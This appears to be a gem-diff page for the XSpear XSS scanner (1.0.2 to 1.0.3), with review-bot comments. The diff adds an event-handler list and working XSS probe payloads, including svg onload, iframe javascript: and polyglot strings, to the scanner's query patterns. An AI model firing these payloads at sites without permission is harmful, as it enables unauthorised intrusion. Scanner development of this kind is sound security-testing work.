XSpear 1.0.2 → 1.0.3
- checksums.yaml +4 -4
- data/.idea/workspace.xml +40 -28
- data/README.md +26 -4
- data/XSpear-1.0.2.gem +0 -0
- data/lib/XSpear/version.rb +1 -1
- data/lib/XSpear.rb +119 -5
- metadata +2 -1
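--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz:
-data.tar.gz:
+metadata.gz: f7f5c25b7930673a6a500037388b459cbf4e4da94a225c0dc647b1f4d13a956a
+data.tar.gz: 29534ac5308419d4be687ed0d14c5eee69b4cae48c767e3d6433b1d12592cbe8
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: 9e846d4845fc6af2ffbdc0775f0759213ed2c3fd7ea885e56f1dc5f419738e458395f9c293a698c2fd3faf1f19f55b33c34c9a87fb19159728e6e579a772a2b7
+data.tar.gz: de1177287bd050790bed48176fddf8c798f4cc2d250d287937774e19616275901bac511fa8ed33bf03789e782aa4c68ba6e96bd39bf16577b001fbc6b4cb0c98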
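--- a/data/.idea/workspace.xml
+++ b/data/.idea/workspace.xml
@@ -3,7 +3,7 @@
 <component name="ChangeListManager">
 <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
 <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
-<change beforePath="$PROJECT_DIR$/XSpear
+<change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
 <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
 </list>
 <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
@@ -38,16 +38,20 @@
 </provider>
 </entry>
 </file>
-<file pinned="false" current-in-tab="
-<entry file="file://$PROJECT_DIR$/
-<provider selected="true" editor-type-id="text-editor"
+<file pinned="false" current-in-tab="true">
+<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+<provider selected="true" editor-type-id="text-editor">
+<state relative-caret-position="213">
+<caret line="262" column="30" lean-forward="true" selection-start-line="262" selection-start-column="30" selection-end-line="262" selection-end-column="30" />
+</state>
+</provider>
 </entry>
 </file>
 <file pinned="false" current-in-tab="false">
 <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
 <provider selected="true" editor-type-id="text-editor">
-<state>
-<caret
+<state relative-caret-position="194">
+<caret line="13" lean-forward="true" selection-start-line="13" selection-end-line="13" />
 </state>
 </provider>
 </entry>
@@ -70,11 +74,11 @@
 </provider>
 </entry>
 </file>
-<file pinned="false" current-in-tab="
+<file pinned="false" current-in-tab="false">
 <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
 <provider selected="true" editor-type-id="text-editor">
 <state relative-caret-position="15">
-<caret line="1" column="
+<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
 </state>
 </provider>
 </entry>
@@ -108,12 +112,12 @@
 <list>
 <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
 <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
-<option value="$PROJECT_DIR$/lib/XSpear.rb" />
 <option value="$PROJECT_DIR$/XSpear.gemspec" />
 <option value="$PROJECT_DIR$/README.md" />
 <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
 <option value="$PROJECT_DIR$/exe/XSpear" />
 <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
+<option value="$PROJECT_DIR$/lib/XSpear.rb" />
 </list>
 </option>
 </component>
@@ -226,7 +230,7 @@
 <option name="presentableId" value="Default" />
 <updated>1562942814778</updated>
 <workItem from="1562942816004" duration="15337000" />
-<workItem from="1563638656518" duration="
+<workItem from="1563638656518" duration="3646000" />
 </task>
 <task id="LOCAL-00001" summary="init update">
 <created>1562945899597</created>
@@ -389,11 +393,18 @@
 <option name="project" value="LOCAL" />
 <updated>1563646762017</updated>
 </task>
-<
+<task id="LOCAL-00024" summary="Edit version , release 1.0.2">
+<created>1563646850278</created>
+<option name="number" value="00024" />
+<option name="presentableId" value="LOCAL-00024" />
+<option name="project" value="LOCAL" />
+<updated>1563646850278</updated>
+</task>
+<option name="localTasksCounter" value="25" />
 <servers />
 </component>
 <component name="TimeTrackingManager">
-<option name="totallyTimeSpent" value="
+<option name="totallyTimeSpent" value="18983000" />
 </component>
 <component name="ToolWindowManager">
 <frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
@@ -439,7 +450,8 @@
 <MESSAGE value="modify dependency rspec" />
 <MESSAGE value="Change Badge(version)" />
 <MESSAGE value="Add show version & edit help, version in banner" />
-<
+<MESSAGE value="Edit version , release 1.0.2" />
+<option name="LAST_COMMIT_MESSAGE" value="Edit version , release 1.0.2" />
 </component>
 <component name="editorHistoryManager">
 <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -452,23 +464,9 @@
 <entry file="file://$PROJECT_DIR$/bin/console">
 <provider selected="true" editor-type-id="text-editor" />
 </entry>
-<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
-<provider selected="true" editor-type-id="text-editor">
-<state relative-caret-position="1740">
-<caret line="116" column="19" selection-start-line="116" selection-start-column="19" selection-end-line="116" selection-end-column="19" />
-</state>
-</provider>
-</entry>
 <entry file="file://$PROJECT_DIR$/bin/setup">
 <provider selected="true" editor-type-id="text-editor" />
 </entry>
-<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
-<provider selected="true" editor-type-id="text-editor">
-<state>
-<caret column="9" selection-start-column="9" selection-end-column="23" />
-</state>
-</provider>
-</entry>
 <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
 <provider selected="true" editor-type-id="text-editor">
 <state relative-caret-position="195">
@@ -513,10 +511,24 @@
 </state>
 </provider>
 </entry>
+<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
+<provider selected="true" editor-type-id="text-editor">
+<state relative-caret-position="194">
+<caret line="13" lean-forward="true" selection-start-line="13" selection-end-line="13" />
+</state>
+</provider>
+</entry>
 <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
 <provider selected="true" editor-type-id="text-editor">
 <state relative-caret-position="15">
-<caret line="1" column="
+<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+</state>
+</provider>
+</entry>
+<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+<provider selected="true" editor-type-id="text-editor">
+<state relative-caret-position="213">
+<caret line="262" column="30" lean-forward="true" selection-start-line="262" selection-start-column="30" selection-end-line="262" selection-end-column="30" />
 </state>
 </provider>
 </entry>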
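--- a/data/README.md
+++ b/data/README.md
@@ -1,7 +1,7 @@
 # XSpear
 XSpear is XSS Scanner on ruby gems
 
-<img src="https://img.shields.io/static/v1.svg?label=lang&message=ruby&color=RED"> <img src="https://img.shields.io/gem/v/XSpear.svg"> <img src="https://img.shields.io/gem/
+<img src="https://img.shields.io/static/v1.svg?label=lang&message=ruby&color=RED"> <img src="https://img.shields.io/gem/v/XSpear.svg"> <img src="https://img.shields.io/gem/dt/XSpear.svg"> <img src="https://img.shields.io/github/license/hahwul/XSpear.svg"> <a href="https://twitter.com/intent/follow?screen_name=hahwul"><img src="https://img.shields.io/static/v1.svg?label=follow&message=hahwul&color=black"></a>
 
 ## Key features
 - Pattern matching based XSS scanning
@@ -23,7 +23,7 @@ Install it yourself as:
 
 Or install it yourself as (local file):
 
-$ gem install XSpear-
+$ gem install XSpear-{version}.gem
 
 Add this line to your application's Gemfile:
 
@@ -66,8 +66,15 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
 + v=2 : show scanning log
 + v=3 : show detail log(req/res)
 -h, --help Prints this help
---
+--version Show XSpear version
+--update Update with online
 ```
+### Result types
+- (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
+- (V)UNL: Vulnerable XSS, Checked alert/prompt/confirm with Selenium
+- (L)OW: Low level issue
+- (M)EDIUM: medium level issue
+- (H)IGH: high level issue
 
 ### Case by Case
 **Scanning XSS**
@@ -213,6 +220,21 @@ class ScanCallbackFunc()
 end
 ```
 
+## Update
+if nomal user
+```
+$ gem update XSpear
+```
+
+if developers (soft)
+```
+$ git pull -v
+```
+if develpers (hard)
+```
+$ git reset --hard HEAD; git pull -v
+```
+
 ## Development
 
 After checking out the repo, run `bin/setup` to install dependencies. Then, run `rake spec` to run the tests. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
@@ -232,5 +254,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
 Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
 
 ## ScreenShot
-<img src="https://user-images.githubusercontent.com/13212227/
+<img src="https://user-images.githubusercontent.com/13212227/61582619-ed233700-ab67-11e9-94f7-33cb6af5997c.png" width=100%>
 <img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>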
data/XSpear-1.0.2.gem
ADDED
|
Binary file
|
data/lib/XSpear/version.rb
CHANGED
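--- a/data/lib/XSpear.rb
+++ b/data/lib/XSpear.rb
@@ -128,9 +128,116 @@ class XspearScan
 
 def run
 r = []
+event_handler = [
+'onAbort',
+'onActivate',
+'onAfterPrint',
+'onAfterUpdate',
+'onBeforeActivate',
+'onBeforeCopy',
+'onBeforeCut',
+'onBeforeDeactivate',
+'onBeforeEditFocus',
+'onBeforePaste',
+'onBeforePrint',
+'onBeforeUnload',
+'onBeforeUpdate',
+'onBegin',
+'onBlur',
+'onBounce',
+'onCellChange',
+'onChange',
+'onClick',
+'onContextMenu',
+'onControlSelect',
+'onCopy',
+'onCut',
+'onDataAvailable',
+'onDataSetChanged',
+'onDataSetComplete',
+'onDblClick',
+'onDeactivate',
+'onDrag',
+'onDragEnd',
+'onDragLeave',
+'onDragEnter',
+'onDragOver',
+'onDragDrop',
+'onDragStart',
+'onDrop',
+'onEnd',
+'onError',
+'onErrorUpdate',
+'onFilterChange',
+'onFinish',
+'onFocus',
+'onFocusIn',
+'onFocusOut',
+'onHashChange',
+'onHelp',
+'onInput',
+'onKeyDown',
+'onKeyPress',
+'onKeyUp',
+'onLayoutComplete',
+'onLoad',
+'onLoseCapture',
+'onMediaComplete',
+'onMediaError',
+'onMessage',
+'onMouseDown',
+'onMouseEnter',
+'onMouseLeave',
+'onMouseMove',
+'onMouseOut',
+'onMouseOver',
+'onMouseUp',
+'onMouseWheel',
+'onMove',
+'onMoveEnd',
+'onMoveStart',
+'onOffline',
+'onOnline',
+'onOutOfSync',
+'onPaste',
+'onPause',
+'onPopState',
+'onProgress',
+'onPropertyChange',
+'onReadyStateChange',
+'onRedo',
+'onRepeat',
+'onReset',
+'onResize',
+'onResizeEnd',
+'onResizeStart',
+'onResume',
+'onReverse',
+'onRowsEnter',
+'onRowExit',
+'onRowDelete',
+'onRowInserted',
+'onScroll',
+'onSeek',
+'onSelect',
+'onSelectionChange',
+'onSelectStart',
+'onStart',
+'onStop',
+'onStorage',
+'onSyncRestored',
+'onSubmit',
+'onTimeError',
+'onTrackChange',
+'onUndo',
+'onUnload',
+'onURLFlip'
+]
+
 log('s', 'creating a test query.')
 r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
 r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
+# Check Special Chat
 r.push makeQueryPattern('f', 'XsPeaR>', 'XsPeaR>', 'i', "not filtered "+">".blue, CallbackStringMatch)
 r.push makeQueryPattern('f', '<XsPeaR', '<XsPeaR', 'i', "not filtered "+"<".blue, CallbackStringMatch)
 r.push makeQueryPattern('f', 'XsPeaR"', 'XsPeaR"', 'i', "not filtered "+'"'.blue, CallbackStringMatch)
@@ -151,14 +258,21 @@ class XspearScan
 r.push makeQueryPattern('f', 'XsPeaR-', 'XsPeaR-', 'i', "not filtered "+"-".blue, CallbackStringMatch)
 r.push makeQueryPattern('f', 'XsPeaR=', 'XsPeaR=', 'i', "not filtered "+"=".blue, CallbackStringMatch)
 r.push makeQueryPattern('f', 'XsPeaR$', 'XsPeaR$', 'i', "not filtered "+"$".blue, CallbackStringMatch)
+# Check Event Handler
+r.push makeQueryPattern('f', '<xspear/onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
+event_handler.each do |ev|
+r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackStringMatch)
+end
 r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
 r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
 r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-r.push makeQueryPattern('x', '"><
-r.push makeQueryPattern('x', '
-r.push makeQueryPattern('x', '
-r.push makeQueryPattern('x', '
-r.push makeQueryPattern('x', '
+r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered "+"<script>alert(45)</script>".red, CallbackXSSSelenium)
+r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered "+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
+r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
+r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
+r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//--><<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
+r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
 r = r.flatten
 r = r.flatten
 log('s', "test query generation is complete. [#{r.length} query]")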
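Review bot: The three polyglot entries at new lines 273–275 pass `'\'"><svg/onload=alert(45)>'` as the pattern argument, which looks copied from line 272 and is not text those payloads would reflect, whereas lines 270–272 keep pattern and payload in step. `CallbackXSSSelenium` is not shown; if it relies only on the browser dialog the argument is dead and misleading, and if it consults the pattern these checks can never report a hit, so a vulnerable parameter would go unreported. Binding each polyglot to a local and passing it for both arguments removes the ambiguity. Separately, the `event_handler.each` loop matches on `"#{ev}=64"` alone, so a response that HTML-encodes the angle brackets but echoes the attribute text would presumably still be logged as not filtered; a comment such as `# reflection hint only: the tag itself may still be encoded` above the loop would tell report readers how to weigh it. `run` starts before the first hunk and continues past the second.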
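--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: XSpear
 version: !ruby/object:Gem::Version
-version: 1.0.
+version: 1.0.3
 platform: ruby
 authors:
 - hahwul
@@ -157,6 +157,7 @@ files:
 - LICENSE.txt
 - README.md
 - Rakefile
+- XSpear-1.0.2.gem
 - XSpear.gemspec
 - bin/console
 - bin/setup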
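Review bot: The `files:` list now ships `XSpear-1.0.2.gem`, a previously built package, inside the 1.0.3 gem; this page shows it only as a binary file, so its contents cannot be reviewed here and every install carries a nested, unaudited artifact. The list is generated from the gemspec (not shown), which presumably collects files with `git ls-files`, so the built gem was likely committed by accident. Filtering the list, for example `spec.files = spec.files.reject { |f| f.end_with?('.gem') || f.start_with?('.idea/') }`, and adding `*.gem` and `.idea/` to `.gitignore` would keep build output out of future releases. The same filter would drop the IDE workspace file this release also packages (`data/.idea/workspace.xml`), which exposes local editor state and tool paths.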